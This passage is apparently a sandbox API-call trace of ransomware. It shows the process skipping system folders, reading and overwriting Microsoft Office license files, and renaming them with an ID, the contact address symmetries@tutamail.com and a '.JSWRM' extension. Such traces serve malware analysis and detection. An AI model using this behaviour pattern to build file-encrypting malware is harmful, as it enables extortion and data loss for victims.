ftCreationTime.dwLowDateTime=0xeae6e174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeae6e174, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb1db7b8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Retail-ppd.xrm-ms", cAlternateFileName="PU0CAE~1.XRM")) returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.615] lstrcmpiW (lpString1="PublisherR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0109.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241010, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0109.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241100, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0109.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0109.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.616] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20781) returned 1 [0109.616] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0109.616] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0109.619] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.619] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0109.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.619] CloseHandle (hObject=0x45c) returned 1 [0109.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0109.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0109.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0109.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0109.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0109.621] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeadd5802, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeadd5802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaeba625, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Retail-ul-oob.xrm-ms", cAlternateFileName="PUF32E~1.XRM")) returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.621] lstrcmpiW (lpString1="PublisherR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0109.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0109.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0109.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0109.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0109.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0109.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.622] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11594) returned 1 [0109.622] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.622] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.624] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.624] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.625] CloseHandle (hObject=0x45c) returned 1 [0109.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0109.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0109.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0109.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0109.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0109.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0109.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0109.626] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeadd5802, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeadd5802, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaf06ac3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Retail-ul-phn.xrm-ms", cAlternateFileName="PU3E83~1.XRM")) returned 1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.626] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.627] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.627] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.627] lstrcmpiW (lpString1="PublisherR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0109.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0109.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2411c8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0109.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0109.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0109.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0109.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.628] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19939) returned 1 [0109.628] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.628] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.671] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.671] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.672] CloseHandle (hObject=0x45c) returned 1 [0109.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0109.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0109.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0109.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0109.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0109.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0109.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | 